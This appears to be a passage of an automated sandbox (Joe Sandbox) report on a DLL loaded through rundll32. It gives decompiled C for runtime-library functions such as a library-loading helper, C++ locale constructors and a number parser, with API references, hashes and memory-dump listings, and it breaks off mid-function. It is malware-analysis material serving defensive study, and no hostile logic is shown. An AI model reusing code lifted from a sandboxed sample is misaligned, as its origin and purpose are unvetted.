                          • Associated: 00000002.00000002.511938993.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511969094.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                          • String ID:
                          • API String ID: 2652629310-0
                          • Opcode ID: 7fb46c4d03f15009eff6bcf12666da4053785c49decca322f54573e66cd471df
                          • Instruction ID: 24040bab084808e666568400936d7155eeaf8ac9e81db9348fa2041b39c9d7f1
                          • Opcode Fuzzy Hash: 7fb46c4d03f15009eff6bcf12666da4053785c49decca322f54573e66cd471df
                          • Instruction Fuzzy Hash: 6B31BF71A1021F9FDF148FA4CC84DBE7BA6EB40614F188568EC14DA351EB35C960CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E253E7F, Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 95%
                          			E6E253E7F(signed int _a4) {
				signed int _t9;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0x6e2c7908 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0x6e271690 + _t9 * 4);
					_t27 = LoadLibraryExW(_t22, 0, 0x800);
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0x8e829fa7
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}










                          0x6e253e84
                          0x6e253e88
                          0x6e253e8f
                          0x6e253e93
                          0x6e253ea1
                          0x6e253eb7
                          0x6e253ebb
                          0x6e253ee4
                          0x6e253ee6
                          0x6e253eea
                          0x6e253eed
                          0x6e253eed
                          0x6e253ef3
                          0x6e253ef5
                          0x00000000
                          0x6e253ef6
                          0x6e253ebd
                          0x6e253ec6
                          0x6e253ed5
                          0x6e253ec8
                          0x6e253ecb
                          0x6e253ed1
                          0x6e253ed1
                          0x6e253ed9
                          0x00000000
                          0x6e253edb
                          0x6e253ede
                          0x6e253ee0
                          0x00000000
                          0x6e253ee0
                          0x6e253ed9
                          0x6e253e95
                          0x6e253e9a
                          0x00000000

                          APIs
                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,6E253E26,?,00000000,00000000,00000000,?,6E2541BD,00000006,FlsSetValue), ref: 6E253EB1
                          • GetLastError.KERNEL32(?,6E253E26,?,00000000,00000000,00000000,?,6E2541BD,00000006,FlsSetValue,6E271C58,FlsSetValue,00000000,00000364,?,6E24D6D1), ref: 6E253EBD
                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,6E253E26,?,00000000,00000000,00000000,?,6E2541BD,00000006,FlsSetValue,6E271C58,FlsSetValue,00000000), ref: 6E253ECB
                          Memory Dump Source
                          • Source File: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000002.00000002.490968383.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511770021.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511847057.000000006E2C8000.00000040.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511938993.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511969094.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: LibraryLoad$ErrorLast
                          • String ID:
                          • API String ID: 3177248105-0
                          • Opcode ID: bd500c6ccd2142fefcc768653c028b14fbdc7204570b0632e09f19f075c29b5c
                          • Instruction ID: b608b0b885ca7fd519d03412d6d71d138d0ca4d3c501e79feaf1a421cc3c9c77
                          • Opcode Fuzzy Hash: bd500c6ccd2142fefcc768653c028b14fbdc7204570b0632e09f19f075c29b5c
                          • Instruction Fuzzy Hash: C601FC3236563B9BCB514BA98D4CD5777EBBF167A1B240624F905D3344DB21D821C6F0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E2114EC, Relevance: 6.0, APIs: 4, Instructions: 40COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 62%
                          			E6E2114EC(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				void* _t15;
				intOrPtr _t17;
				void* _t20;
				intOrPtr* _t32;
				void* _t35;

				E6E2200AC(0x6e268a31, __ebx, __edi, __esi, 0x3c);
				_t32 =  *((intOrPtr*)(_t35 + 8));
				_t34 = 0;
				_t23 = 0;
				 *((intOrPtr*)(_t35 - 0x10)) = 0;
				if(_t32 != 0) {
					_t37 =  *_t32;
					if( *_t32 == 0) {
						_push(0x44);
						_t17 = E6E21F8B6(__edx, 0, _t37);
						 *((intOrPtr*)(_t35 - 0x14)) = _t17;
						 *((intOrPtr*)(_t35 - 4)) = 0;
						if(_t17 != 0) {
							_push(E6E1E1703( *((intOrPtr*)(_t35 + 0xc))));
							_t20 = E6E1E1450(0, _t35 - 0x48, __edx, _t32, 0);
							_t23 = 1;
							_push(0);
							_push(_t20);
							 *((char*)(_t35 - 4)) = 1;
							 *((intOrPtr*)(_t35 - 0x10)) = 1;
							_t34 = E6E210110( *((intOrPtr*)(_t35 - 0x14)), 0);
						}
						 *_t32 = _t34;
						if((_t23 & 0x00000001) != 0) {
							E6E1E14CE(_t35 - 0x48);
						}
					}
				}
				_t15 = 5;
				return E6E220075(_t15);
			}








                          0x6e2114f3
                          0x6e2114f8
                          0x6e2114fb
                          0x6e2114fd
                          0x6e2114ff
                          0x6e211504
                          0x6e211506
                          0x6e211508
                          0x6e21150a
                          0x6e21150c
                          0x6e211512
                          0x6e211515
                          0x6e21151a
                          0x6e211524
                          0x6e211528
                          0x6e211530
                          0x6e211531
                          0x6e211532
                          0x6e211533
                          0x6e211536
                          0x6e21153e
                          0x6e21153e
                          0x6e211540
                          0x6e211545
                          0x6e21154a
                          0x6e21154a
                          0x6e211545
                          0x6e211508
                          0x6e211551
                          0x6e211557

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E2114F3
                          • std::_Locinfo::_Locinfo.LIBCPMT ref: 6E211528
                            • Part of subcall function 6E1E1450: __EH_prolog3.LIBCMT ref: 6E1E1457
                            • Part of subcall function 6E1E1450: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E1464
                            • Part of subcall function 6E1E1450: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6E1E14A1
                          • numpunct.LIBCPMT ref: 6E211539
                            • Part of subcall function 6E210110: __EH_prolog3.LIBCMT ref: 6E210117
                          • std::_Locinfo::~_Locinfo.LIBCPMT ref: 6E21154A
                          Memory Dump Source
                          • Source File: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000002.00000002.490968383.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511770021.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511847057.000000006E2C8000.00000040.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511938993.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511969094.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$H_prolog3$LocinfoLocinfo::_$Locinfo::~_Locinfo_ctorLockitLockit::_numpunct
                          • String ID:
                          • API String ID: 495030518-0
                          • Opcode ID: ca74bff06275c5931e4a44ae1e9984cda77c3e80dc4bdb71cd9baa11385d0539
                          • Instruction ID: 2e32ef2f549774a53d890ce118931582242e0feea91c09fbe127c2a04df80d54
                          • Opcode Fuzzy Hash: ca74bff06275c5931e4a44ae1e9984cda77c3e80dc4bdb71cd9baa11385d0539
                          • Instruction Fuzzy Hash: 8701D674A0021F9FD701CBE8C851BDE7BBAAF10744F100416E615BB240EB704B85C791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E211558, Relevance: 6.0, APIs: 4, Instructions: 40COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 62%
                          			E6E211558(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				void* _t15;
				intOrPtr _t17;
				void* _t20;
				intOrPtr* _t32;
				void* _t35;

				E6E2200AC(0x6e268a31, __ebx, __edi, __esi, 0x3c);
				_t32 =  *((intOrPtr*)(_t35 + 8));
				_t34 = 0;
				_t23 = 0;
				 *((intOrPtr*)(_t35 - 0x10)) = 0;
				if(_t32 != 0) {
					_t37 =  *_t32;
					if( *_t32 == 0) {
						_push(0x44);
						_t17 = E6E21F8B6(__edx, 0, _t37);
						 *((intOrPtr*)(_t35 - 0x14)) = _t17;
						 *((intOrPtr*)(_t35 - 4)) = 0;
						if(_t17 != 0) {
							_push(E6E1E1703( *((intOrPtr*)(_t35 + 0xc))));
							_t20 = E6E1E1450(0, _t35 - 0x48, __edx, _t32, 0);
							_t23 = 1;
							_push(0);
							_push(_t20);
							 *((char*)(_t35 - 4)) = 1;
							 *((intOrPtr*)(_t35 - 0x10)) = 1;
							_t34 = E6E210143( *((intOrPtr*)(_t35 - 0x14)), 0);
						}
						 *_t32 = _t34;
						if((_t23 & 0x00000001) != 0) {
							E6E1E14CE(_t35 - 0x48);
						}
					}
				}
				_t15 = 5;
				return E6E220075(_t15);
			}








                          0x6e21155f
                          0x6e211564
                          0x6e211567
                          0x6e211569
                          0x6e21156b
                          0x6e211570
                          0x6e211572
                          0x6e211574
                          0x6e211576
                          0x6e211578
                          0x6e21157e
                          0x6e211581
                          0x6e211586
                          0x6e211590
                          0x6e211594
                          0x6e21159c
                          0x6e21159d
                          0x6e21159e
                          0x6e21159f
                          0x6e2115a2
                          0x6e2115aa
                          0x6e2115aa
                          0x6e2115ac
                          0x6e2115b1
                          0x6e2115b6
                          0x6e2115b6
                          0x6e2115b1
                          0x6e211574
                          0x6e2115bd
                          0x6e2115c3

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E21155F
                          • std::_Locinfo::_Locinfo.LIBCPMT ref: 6E211594
                            • Part of subcall function 6E1E1450: __EH_prolog3.LIBCMT ref: 6E1E1457
                            • Part of subcall function 6E1E1450: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E1464
                            • Part of subcall function 6E1E1450: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6E1E14A1
                          • numpunct.LIBCPMT ref: 6E2115A5
                            • Part of subcall function 6E210143: __EH_prolog3.LIBCMT ref: 6E21014A
                          • std::_Locinfo::~_Locinfo.LIBCPMT ref: 6E2115B6
                          Memory Dump Source
                          • Source File: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000002.00000002.490968383.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511770021.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511847057.000000006E2C8000.00000040.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511938993.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511969094.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$H_prolog3$LocinfoLocinfo::_$Locinfo::~_Locinfo_ctorLockitLockit::_numpunct
                          • String ID:
                          • API String ID: 495030518-0
                          • Opcode ID: e5b8471a24d63ed3435a8a9aa2e4711833c10f7599d909bd29edbc293d20b0e2
                          • Instruction ID: 8e155efdcd922922af3e2e2a8304fb80cc0c8c159035ca2b258a3c26daefa17d
                          • Opcode Fuzzy Hash: e5b8471a24d63ed3435a8a9aa2e4711833c10f7599d909bd29edbc293d20b0e2
                          • Instruction Fuzzy Hash: C501D1B4A0421FAFDB20CBE4C860BDEBBBAAF14744F100515EA15AB280CBB04B85C790
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E21C229, Relevance: 6.0, APIs: 4, Instructions: 40COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 62%
                          			E6E21C229(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				void* _t15;
				intOrPtr _t17;
				void* _t20;
				intOrPtr* _t32;
				void* _t35;

				E6E2200AC(0x6e268a31, __ebx, __edi, __esi, 0x3c);
				_t32 =  *((intOrPtr*)(_t35 + 8));
				_t34 = 0;
				_t23 = 0;
				 *((intOrPtr*)(_t35 - 0x10)) = 0;
				if(_t32 != 0) {
					_t37 =  *_t32;
					if( *_t32 == 0) {
						_push(0x44);
						_t17 = E6E21F8B6(__edx, 0, _t37);
						 *((intOrPtr*)(_t35 - 0x14)) = _t17;
						 *((intOrPtr*)(_t35 - 4)) = 0;
						if(_t17 != 0) {
							_push(E6E1E1703( *((intOrPtr*)(_t35 + 0xc))));
							_t20 = E6E1E1450(0, _t35 - 0x48, __edx, _t32, 0);
							_t23 = 1;
							_push(0);
							_push(_t20);
							 *((char*)(_t35 - 4)) = 1;
							 *((intOrPtr*)(_t35 - 0x10)) = 1;
							_t34 = E6E21BD9F( *((intOrPtr*)(_t35 - 0x14)), 0);
						}
						 *_t32 = _t34;
						if((_t23 & 0x00000001) != 0) {
							E6E1E14CE(_t35 - 0x48);
						}
					}
				}
				_t15 = 5;
				return E6E220075(_t15);
			}








                          0x6e21c230
                          0x6e21c235
                          0x6e21c238
                          0x6e21c23a
                          0x6e21c23c
                          0x6e21c241
                          0x6e21c243
                          0x6e21c245
                          0x6e21c247
                          0x6e21c249
                          0x6e21c24f
                          0x6e21c252
                          0x6e21c257
                          0x6e21c261
                          0x6e21c265
                          0x6e21c26d
                          0x6e21c26e
                          0x6e21c26f
                          0x6e21c270
                          0x6e21c273
                          0x6e21c27b
                          0x6e21c27b
                          0x6e21c27d
                          0x6e21c282
                          0x6e21c287
                          0x6e21c287
                          0x6e21c282
                          0x6e21c245
                          0x6e21c28e
                          0x6e21c294

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E21C230
                          • std::_Locinfo::_Locinfo.LIBCPMT ref: 6E21C265
                            • Part of subcall function 6E1E1450: __EH_prolog3.LIBCMT ref: 6E1E1457
                            • Part of subcall function 6E1E1450: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E1464
                            • Part of subcall function 6E1E1450: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6E1E14A1
                          • numpunct.LIBCPMT ref: 6E21C276
                            • Part of subcall function 6E21BD9F: __EH_prolog3.LIBCMT ref: 6E21BDA6
                          • std::_Locinfo::~_Locinfo.LIBCPMT ref: 6E21C287
                          Memory Dump Source
                          • Source File: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000002.00000002.490968383.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511770021.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511847057.000000006E2C8000.00000040.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511938993.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511969094.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$H_prolog3$LocinfoLocinfo::_$Locinfo::~_Locinfo_ctorLockitLockit::_numpunct
                          • String ID:
                          • API String ID: 495030518-0
                          • Opcode ID: f38f91064a28927fe4ed4d01f9ff91bd8b9e8aa2be123b6557021c5b8a412cb5
                          • Instruction ID: d7d19c46935fcf2b72b34e4d060d71294fd56aa4c7bf56b0b49adc697a4a4342
                          • Opcode Fuzzy Hash: f38f91064a28927fe4ed4d01f9ff91bd8b9e8aa2be123b6557021c5b8a412cb5
                          • Instruction Fuzzy Hash: B5016D79A0421EDBDB45DFE4C851ADEBBFAAF44B85F100525E614AB280CBB04B41C791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E1E18A0, Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 87%
                          			E6E1E18A0(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				void* _t12;
				void* _t16;
				intOrPtr* _t28;
				intOrPtr* _t30;
				void* _t31;

				E6E2200AC(0x6e267d45, __ebx, __edi, __esi, 0x34);
				_t28 =  *((intOrPtr*)(_t31 + 8));
				if(_t28 != 0) {
					_t33 =  *_t28;
					if( *_t28 == 0) {
						_t30 = E6E21F8B6(__edx, __esi, _t33);
						 *((intOrPtr*)(_t31 + 8)) = _t30;
						 *(_t31 - 4) =  *(_t31 - 4) & 0x00000000;
						_t16 = E6E1E1450(__ebx, _t31 - 0x40, __edx, _t28, _t30, E6E1E1703( *((intOrPtr*)(_t31 + 0xc))), 0x44);
						 *(_t30 + 4) =  *(_t30 + 4) & 0x00000000;
						 *_t30 = 0x6e26a9c0;
						E6E1E1928(_t30, _t16);
						 *_t28 = _t30;
						E6E1E14CE(_t31 - 0x40);
					}
				}
				_t12 = 2;
				return E6E220075(_t12);
			}








                          0x6e1e18a7
                          0x6e1e18ac
                          0x6e1e18b1
                          0x6e1e18b3
                          0x6e1e18b6
                          0x6e1e18bf
                          0x6e1e18c2
                          0x6e1e18c8
                          0x6e1e18d5
                          0x6e1e18da
                          0x6e1e18e1
                          0x6e1e18e7
                          0x6e1e18ef
                          0x6e1e18f1
                          0x6e1e18f1
                          0x6e1e18b6
                          0x6e1e18f8
                          0x6e1e18fe

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E1E18A7
                          • std::_Locinfo::_Locinfo.LIBCPMT ref: 6E1E18D5
                            • Part of subcall function 6E1E1450: __EH_prolog3.LIBCMT ref: 6E1E1457
                            • Part of subcall function 6E1E1450: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E1464
                            • Part of subcall function 6E1E1450: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6E1E14A1
                          • ctype.LIBCPMT ref: 6E1E18E7
                            • Part of subcall function 6E1E1928: __Getctype.LIBCPMT ref: 6E1E1937
                            • Part of subcall function 6E1E1928: __Getcvt.LIBCPMT ref: 6E1E1949
                          • std::_Locinfo::~_Locinfo.LIBCPMT ref: 6E1E18F1
                            • Part of subcall function 6E1E14CE: std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 6E1E14F5
                            • Part of subcall function 6E1E14CE: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1566
                          Memory Dump Source
                          • Source File: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000002.00000002.490968383.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511770021.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511847057.000000006E2C8000.00000040.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511938993.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511969094.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Locinfo::_$H_prolog3LocinfoLockit$GetctypeGetcvtLocinfo::~_Locinfo_ctorLocinfo_dtorLockit::_Lockit::~_ctype
                          • String ID:
                          • API String ID: 1262428101-0
                          • Opcode ID: 6b402c894a351771aba23446e0dc5153827fa45ad133f232d542f9a38956b265
                          • Instruction ID: 3dff2b7836515da84c69f6901c1163d2e3d80ca426f2cef45d09b40a278377ee
                          • Opcode Fuzzy Hash: 6b402c894a351771aba23446e0dc5153827fa45ad133f232d542f9a38956b265
                          • Instruction Fuzzy Hash: 61F09AB5A00B0DDFEB10DFD0C411BDDB7AAAF00B19F204818F2195B680DBB456C4DA80
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20B968, Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 323COMMON
                          Download Yara Rule
                          C-Code - Quality: 74%
                          			E6E20B968(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t135;
				intOrPtr* _t136;
				intOrPtr* _t141;
				void* _t146;
				char _t152;
				signed int _t153;
				char* _t154;
				signed int _t160;
				void* _t166;
				void* _t167;
				char* _t173;
				void* _t174;
				void* _t175;
				void* _t185;
				intOrPtr _t186;
				intOrPtr _t192;
				intOrPtr _t198;
				char* _t199;
				intOrPtr _t213;
				char _t224;
				intOrPtr* _t235;
				signed int _t236;
				signed int _t237;
				intOrPtr _t238;
				signed int _t242;
				signed int _t243;
				char* _t247;
				signed int _t249;
				signed int _t251;
				void* _t252;
				void* _t253;

				_t234 = __edx;
				E6E2200E0(0x6e2686b8, __ebx, __edi, __esi, 0x70);
				_t198 =  *((intOrPtr*)(_t252 + 0x10));
				 *((intOrPtr*)(_t252 - 0x78)) =  *((intOrPtr*)(_t252 + 0xc));
				 *((intOrPtr*)(_t252 - 0x70)) =  *((intOrPtr*)(_t252 + 0x14));
				_t135 =  *(_t252 + 0x1c);
				 *(_t252 - 0x68) = _t135;
				_t136 = E6E20A2F1(_t198, __edx, __edi, __esi, __eflags);
				_t240 = _t136;
				_t245 =  *((intOrPtr*)( *_t136 + 0x14));
				 *0x6e26a26c(_t252 - 0x5c, _t135);
				 *((intOrPtr*)( *((intOrPtr*)( *_t136 + 0x14))))();
				 *(_t252 - 4) =  *(_t252 - 4) & 0x00000000;
				_t255 =  *((intOrPtr*)(_t252 - 0x4c));
				if( *((intOrPtr*)(_t252 - 0x4c)) != 0) {
					 *((char*)(_t252 - 0x5e)) = E6E20DA49(_t240);
				} else {
					 *((char*)(_t252 - 0x5e)) = 0;
				}
				_t141 = E6E20A0FF(_t198, _t234, _t240, _t245, _t255);
				 *0x6e26a26c("0123456789ABCDEFabcdef-+Xx", 0x6e26ba77, _t252 - 0x2c,  *(_t252 - 0x68));
				 *((intOrPtr*)( *((intOrPtr*)( *_t141 + 0x1c))))();
				_t247 =  *((intOrPtr*)(_t252 - 0x78));
				 *((intOrPtr*)(_t252 - 0x6c)) = _t247;
				_t146 = E6E20D7A6(_t198,  *((intOrPtr*)(_t252 - 0x70)));
				if(_t146 != 0) {
					L13:
					_t249 =  *(_t252 + 0x18) & 0x00000e00;
					_t242 = 0xa;
					 *(_t252 - 0x68) = _t242;
					if(_t249 != 0x400) {
						__eflags = _t249 - 0x800;
						if(_t249 != 0x800) {
							asm("sbb esi, esi");
							_t251 =  ~_t249 & _t242;
							__eflags = _t251;
							L19:
							 *((char*)(_t252 - 0x5d)) = 0;
							 *((char*)(_t252 - 0x74)) = 0;
							 *((char*)(_t252 - 0x5f)) = 0;
							E6E20D7A6(_t198,  *((intOrPtr*)(_t252 - 0x70)));
							if(0 != 0) {
								L35:
								__eflags = _t251;
								if(_t251 == 0) {
									L38:
									 *(_t252 - 0x34) =  *(_t252 - 0x34) & 0x00000000;
									 *((intOrPtr*)(_t252 - 0x30)) = 0xf;
									 *(_t252 - 0x44) = 0;
									E6E206BD5(_t252 - 0x44, 1,  *((intOrPtr*)(_t252 - 0x74)));
									 *(_t252 - 4) = 1;
									_t243 = 0;
									 *((intOrPtr*)(_t252 - 0x7c)) =  *((intOrPtr*)(_t252 - 0x78)) + 0x1f;
									_t152 = E6E20D7A6(_t198,  *((intOrPtr*)(_t252 - 0x70)));
									if(_t152 != 0) {
										_t213 =  *((intOrPtr*)(_t252 - 0x30));
										_t153 =  *(_t252 - 0x44);
										L71:
										_t199 =  *((intOrPtr*)(_t252 - 0x5d));
										L72:
										_t235 = _t252 - 0x5c;
										if( *((intOrPtr*)(_t252 - 0x48)) >= 0x10) {
											_t235 =  *((intOrPtr*)(_t252 - 0x5c));
										}
										if(_t199 == 0) {
											L89:
											_t154 =  *((intOrPtr*)(_t252 - 0x78));
											goto L90;
										} else {
											while(_t243 != 0) {
												_t199 =  *_t235;
												if(_t199 == 0x7f) {
													break;
												}
												_t243 = _t243 - 1;
												if(_t243 == 0) {
													L81:
													if(_t243 != 0) {
														L85:
														_t199 = _t235 + 1;
														if( *_t199 > 0) {
															_t235 = _t199;
														}
														continue;
													}
													 *(_t252 - 0x68) = _t252 - 0x44;
													if( *((intOrPtr*)(_t252 - 0x30)) >= 0x10) {
														 *(_t252 - 0x68) = _t153;
													}
													_t213 =  *((intOrPtr*)(_t252 - 0x30));
													if(_t199 <  *( *(_t252 - 0x68))) {
														goto L89;
													} else {
														goto L85;
													}
												}
												 *(_t252 - 0x68) = _t252 - 0x44;
												_t160 =  *(_t252 - 0x44);
												if(_t213 >= 0x10) {
													_t213 =  *((intOrPtr*)(_t252 - 0x30));
													 *(_t252 - 0x68) = _t160;
												}
												_t153 =  *(_t252 - 0x44);
												if(_t199 !=  *((intOrPtr*)( *(_t252 - 0x68) + _t243))) {
													goto L89;
												} else {
													goto L81;
												}
											}
											__eflags =  *((char*)(_t252 - 0x5f));
											_t154 =  *((intOrPtr*)(_t252 - 0x6c));
											if( *((char*)(_t252 - 0x5f)) == 0) {
												 *_t154 = 0x30;
												_t154 = _t154 + 1;
											}
											L90:
											 *_t154 = 0;
											E6E202B76(_t252 - 0x44);
											E6E202B76(_t252 - 0x5c);
											return E6E22008A(_t251, _t199, _t243, _t251);
										}
									}
									 *((char*)(_t252 - 0x74)) = _t152;
									do {
										if( *((char*)(_t198 + 4)) == 0) {
											E6E20C59E(_t198);
										}
										_push( *((intOrPtr*)(_t252 - 0x74)));
										 *((char*)(_t252 - 0x64)) =  *((intOrPtr*)(_t198 + 5));
										_t166 = E6E209DF2(_t252 - 0x2c, _t252 - 0x12, _t252 - 0x64);
										_t253 = _t253 + 0x10;
										_t167 = _t166 - _t252 - 0x2c;
										if(_t167 >=  *(_t252 - 0x68)) {
											_t213 =  *((intOrPtr*)(_t252 - 0x30));
											_t236 = _t252 - 0x44;
											_t153 =  *(_t252 - 0x44);
											__eflags = _t213 - 0x10;
											if(_t213 >= 0x10) {
												_t236 = _t153;
											}
											__eflags =  *((char*)(_t236 + _t243));
											if( *((char*)(_t236 + _t243)) == 0) {
												L64:
												if(_t243 == 0) {
													goto L71;
												}
												_t237 = _t252 - 0x44;
												if(_t213 >= 0x10) {
													_t237 = _t153;
												}
												if( *((char*)(_t237 + _t243)) <= 0) {
													_t199 = 0;
													goto L72;
												} else {
													_t243 = _t243 + 1;
													goto L71;
												}
											} else {
												__eflags =  *((char*)(_t252 - 0x5e));
												if( *((char*)(_t252 - 0x5e)) == 0) {
													goto L64;
												}
												__eflags =  *((char*)(_t198 + 4));
												if( *((char*)(_t198 + 4)) != 0) {
													_t238 =  *((intOrPtr*)(_t252 - 0x64));
												} else {
													E6E20C59E(_t198);
													_t238 =  *((intOrPtr*)(_t198 + 5));
													_t213 =  *((intOrPtr*)(_t252 - 0x30));
													_t153 =  *(_t252 - 0x44);
												}
												__eflags = _t238 -  *((intOrPtr*)(_t252 - 0x5e));
												if(_t238 !=  *((intOrPtr*)(_t252 - 0x5e))) {
													goto L64;
												} else {
													E6E2086F2(_t252 - 0x44, 0);
													_t243 = _t243 + 1;
													__eflags = _t243;
													goto L62;
												}
											}
										} else {
											_t224 =  *((intOrPtr*)(_t167 + "0123456789ABCDEFabcdef-+Xx"));
											_t173 =  *((intOrPtr*)(_t252 - 0x6c));
											 *_t173 = _t224;
											if( *((char*)(_t252 - 0x5f)) != 0 || _t224 != 0x30) {
												if(_t173 <  *((intOrPtr*)(_t252 - 0x7c))) {
													 *((char*)(_t252 - 0x5f)) = 1;
													 *((intOrPtr*)(_t252 - 0x6c)) = _t173 + 1;
												}
											}
											_t174 = _t252 - 0x44;
											 *((char*)(_t252 - 0x5d)) = 1;
											if( *((intOrPtr*)(_t252 - 0x30)) >= 0x10) {
												_t174 =  *(_t252 - 0x44);
											}
											if( *((char*)(_t174 + _t243)) != 0x7f) {
												_t175 = _t252 - 0x44;
												if( *((intOrPtr*)(_t252 - 0x30)) >= 0x10) {
													_t175 =  *(_t252 - 0x44);
												}
												 *((char*)(_t175 + _t243)) =  *((char*)(_t175 + _t243)) + 1;
											}
										}
										L62:
										E6E20BD8B(_t198);
									} while (E6E20D7A6(_t198,  *((intOrPtr*)(_t252 - 0x70))) == 0);
									_t213 =  *((intOrPtr*)(_t252 - 0x30));
